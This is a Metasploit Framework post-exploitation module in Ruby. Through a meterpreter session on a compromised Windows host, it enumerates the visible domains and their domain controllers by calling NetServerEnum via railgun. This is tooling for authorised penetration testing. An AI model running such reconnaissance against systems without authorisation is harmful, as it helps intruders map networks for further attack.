## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, 'Name' => 'Windows Gather Domain Enumeration', 'Description' => %q{ This module enumerates currently the domains a host can see and the domain controllers for that domain. }, 'License' => MSF_LICENSE, 'Author' => [ 'mubix' ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) end def run domain_enum = 2147483648 # SV_TYPE_DOMAIN_ENUM = hex 80000000 buffersize = 500 result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domain_enum,nil,nil) print_status("Finding the right buffersize...") while result['return'] == 234 print_status("Tested #{buffersize}, got #{result['entriesread']} of #{result['totalentries']}") buffersize = buffersize + 500 result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domain_enum,nil,nil) end count = result['totalentries'] print_status("#{count} domain(s) found.") startmem = result['bufptr'] base = 0 domains = [] mem = client.railgun.memread(startmem, 8*count) count.times{|i| x = {} x[:platform] = mem[(base + 0),4].unpack("V*")[0] nameptr = mem[(base + 4),4].unpack("V*")[0] x[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join domains << x base = base + 8 } domaincontrollers = 24 # 10 + 8 (SV_TYPE_DOMAIN_BAKCTRL || SV_TYPE_DOMAIN_CTRL) domains.each do |x| print_status("Enumerating DCs for #{x[:domain]}") result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domaincontrollers,x[:domain],nil) while result['return'] == 234 buffersize = buffersize + 500 result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domaincontrollers,x[:domain],nil) end if result['totalentries'] == 0 print_error("No Domain Controllers found...") next end count = result['totalentries'] startmem = result['bufptr'] base = 0 x[:dc] = [] mem = client.railgun.memread(startmem, 8*count) count.times{|i| t = {} t[:platform] = mem[(base + 0),4].unpack("V*")[0] nameptr = mem[(base + 4),4].unpack("V*")[0] t[:dc_hostname] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join x[:dc] << t base = base + 8 print_status(t[:dc_hostname]) report_note( :host => session, :type => 'domain.hostnames', :data => t[:dc_hostname], :update => :unique_data ) } end end end